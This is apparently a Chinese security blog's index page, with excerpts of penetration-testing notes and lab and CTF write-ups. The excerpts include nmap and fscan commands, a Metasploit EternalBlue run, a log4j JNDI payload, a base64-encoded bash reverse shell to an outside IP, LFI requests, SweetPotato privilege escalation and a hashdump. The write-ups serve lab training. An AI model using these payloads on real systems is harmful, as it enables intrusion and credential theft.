晴川's Blog🌈

渗透技巧小记录Nmap常用命令123456789nmap 192.168.0.1/24 //扫描网段下的地址nmap -sV -A 192.168.131.82 //基础的探测服务命令，端口及对应服务nmap -sS -sV -sC -p- 192.168.131.82-oN nmap_full_scan //SYN扫描，比较隐秘，文件会保存nmap -A -v -sV -T5 -p- --script=http-enum 192.168.131.82 //扫目录nmap --script=auth 192.168.0.101 //弱口令nmap --script=vuln 192.168.0.101 //扫描常见漏洞nmap --script=brute 192.168.0.101 //暴力破解nohup ./gost -L=:10000 > ./gost.log & Fscan常用命令123456789101112fscan -h ipfscan -h ip -o 1.txt //保存到指定文件-p 1-65537 // 指定端口-m ssh ...

春秋云境-Privilege 靶标介绍： 在这个靶场中，您将扮演一名资深黑客，被雇佣来评估虚构公司 XR Shop 的网络安全。您需要通过渗透测试逐个击破公司暴露在公网的应用，并通过后渗透技巧深入 XR Shop 的内部网络，寻找潜在的弱点和漏洞，并通过滥用 Windows 特权获取管理员权限，最终并获取隐藏在其内部的核心机密。该靶场共有 4 个 Flag，分布于不同的靶机。 flag01 请获取 XR Shop 官网源码的备份文件，并尝试获得系统上任意文件读取的能力。并且，管理员在配置 Jenkins 时，仍然选择了使用初始管理员密码，请尝试读取该密码并获取 Jenkins 服务器权限。Jenkins 配置目录为 C:\ProgramData\Jenkins.jenkins。 先是fscan扫扫看看 发现www.zip，利用代码审计 发现在/tools/content-log.php存在任意文件读取 123456789<?php$logfile = rawurldecode( $_GET['logfile'] );// M ...

内网横向记录MS17_010内网机器中存在永恒之蓝漏洞，利用kali自带的msf即可攻击 123456proxychains msfconsoleuse exploit/windows/smb/ms17_010_eternalblueshow payloads set payload windows/x64/meterpreter/bind_tcp_uuid //设置payloadset RHOSTS 172.22.1.21 //设置目标地址ipexploit 成功之后会有交互式shell 哈希传递攻击拿到用户的NTLM Hash值后可以进行哈希传递 原理就是攻击者可以直接通过LM Hash和NTLM Hash访问远程主机或服务，而不用提供明文密码。 其中重要的是windows使用系统API(LsaLogonUser)生成hash进行认证，而不是用明文，所以利用hash即可模拟用户登录进行操作。还有的是如果密码长度大于15就不存在LM Hash，从windows2008开始微软默认禁用LM hash。 这类攻击适用于： 域/工作组环境 可以获得hash，但是条件不允许对 ...

春秋云境-Exchange前言好久没打了春秋云镜的靶场了，来打个靶场回顾回顾 打攻防摸鱼的时候打的 嘻嘻 flag01上fscan搜集一波 8000端口有ERP 借鉴华夏ERPhttps://mp.weixin.qq.com/s?__biz=Mzg2OTg5NjE5MQ==&mid=2247484475&idx=1&sn=deee0c3bc0b9fe10b89af784947aa1a3&chksm=ce975eabf9e0d7bd5c952c462883fa89eafaadfba829dd2058fccb135a5a6970e29fe6487e1a&scene=126&sessionid=1686528295&key=42e64e73470f56ada54bd87e00fbb9ee86826bf40b566f978fb0f0e311c0eb4ab318884991ba35ad361aa1595ed3bd0846512b2fe73e212c0c074eb836d443f457f9ea24f06bf67d68ba10b149db1 ...

春秋云境Certifyflag01信息搜集 访问8983端口，发现solr利用了log4j配置，那就打log4jRCE payload 1${jndi:ldap://101.34.80.152:1389/rxiwph} vps 启动 12345java -jar JNDI-Injection-Exploit-1.0-SNAPSHOT-all.jar -A 101.34.80.152 -C "bash -c {echo,YmFzaCAtaSA+JiAvZGV2L3RjcC8xMDEuMzQuODAuMTUyLzk5OTkgMD4mMQ==}|{base64,-d}|{bash,-i}"nc -lvvp 9999 12345678GET /solr/admin/cores?action=${jndi:ldap://101.34.80.152:1389/rxiwph} HTTP/1.1Host: User-Agent: Mozilla/5.0 (Windows N ...

2024NepCTFMiscNepMagic —— CheckIn玩完就给flag了，老老实实的玩就行 3DNep既然是3D，那得用3D文件打开 找个在线网站打开就好 发现底部有个汉信码 中国物品编码APP扫码 Nemophila123456789101112131415161718192021222324252627282930313233343536373839404142434445464748495051525354555657585960616263646566import base64print("这里有一个藏宝室，镇守着一个宝箱怪，当你说出正确的口令时，你也就快获得了这个屋子里最至高无上的宝物。")print("提示：宝箱怪只会提示你口令正确与否，请你试试吧！")flag = input('Turn in your guess: ')if len(flag) !=48: print("长度不对！") exit(1)if ord(flag.capitalize()[0]) != ...

春秋云境Delegationflag01开局是个cms先看看后台弱口令，好家伙， admin/123456直接登上了 有本地文件包含漏洞 123456789POST /index.php?case=template&act=save&admin_dir=admin&site=default HTTP/1.1Host: 39.101.167.165Content-Length: 81X-Requested-With: XMLHttpRequestUser-Agent: Mozilla/5.0Content-Type: application/x-www-form-urlencoded;Cookie: PHPSESSID=os9kli93e59pjclq4361kaairm; loginfalse74c6352c5a281ec5947783b8a186e225=1; login_username=admin; login_password=a14cdfc627cef32c707a7988e70c1313sid=#data_d_.._d_.._d_.._d_ ...

春秋云境-Brute4Roadflag01信息搜集 看到开放了6379端口，redis，很明显要打redis了 redid常见利用方式： 一.利用ssh_keygen登录服务器 条件： 1、Redis服务使用ROOT账号启动 2、服务器开放了SSH服务，而且允许使用密钥登录，即可远程写入一个公钥，直接登录远程服务器。 二、利用计划任务反弹shell 条件： root启用Redis redis无密码或者弱密码 三、Redis直接写webshell 条件： 知道网站绝对路径，并且需要增删改查权限 root启动redis redis弱密码或者无密码 四、Redis主从复制getshell 条件： Redis 版本(4.x~5.0.5)（新增模块功能，可以通过C语言并编译出恶意.so文件） redis弱密码或者无密码 root启动redis 五.结合SSRF进行利用 条件： root启用redis 目标机存在dict协议 知道网站绝对路径 redis无密码或者弱密码 六、redis写lua Redis写马尝试进行写反弹任务 123456redis-cli -h 192.168.33.134 ...

春秋云境Timeflag01端口扫描 7687和7474是neo4j，直接找cve https://github.com/zwjjustdoit/CVE-2021-34371.jar?tab=readme-ov-file 1java -jar rhino_gadget.jar rmi://39.99.224.197:1337 "bash -c {echo,YmFzaCAtaSA+JiAvZGV2L3RjcC8xMDEuMzQuODAuMTUyLzk5OTkgMD4mMQ==}|{base64,-d}|{bash,-i}" 提示了kerberos flag02将fscan，frp下载到靶机 服务器python起http服务就行 123python3 -m http.server 8080wget http://101.34.80.152:8080/frpc.ini 查看ip 1234172.22.6.12 域控172.22.6.25 域内机器172.22.6.36 当前机 ...

春秋云境Tsclient##flag01 fscan扫一扫 弱口令mssql 先执行命令，发现不行需要激活插件，上方激活组件即可 在此路径发现有可写权限，cs上马 这里卡了半天（后面做题慢慢发觉是cs回连间隔太长，调小一点就好 1C:/Users/Public/sweetpotato.exe -a "type C:\Users\Administrator\flag\flag01.txt" 我直接在MDUT执行 后边cs也行了，链接不咋稳定 flag02在运行一次马提升个权限 1shell c:\\users\\public\\sweetpotato.exe -a "c:\\users\\public\\beacon.exe" 信息搜集 1shell net user 12345678hashdump[*] Tasked beacon to dump hashes[+] host called home, sent: 82549 bytes[+] received password hashes:Administrator: ...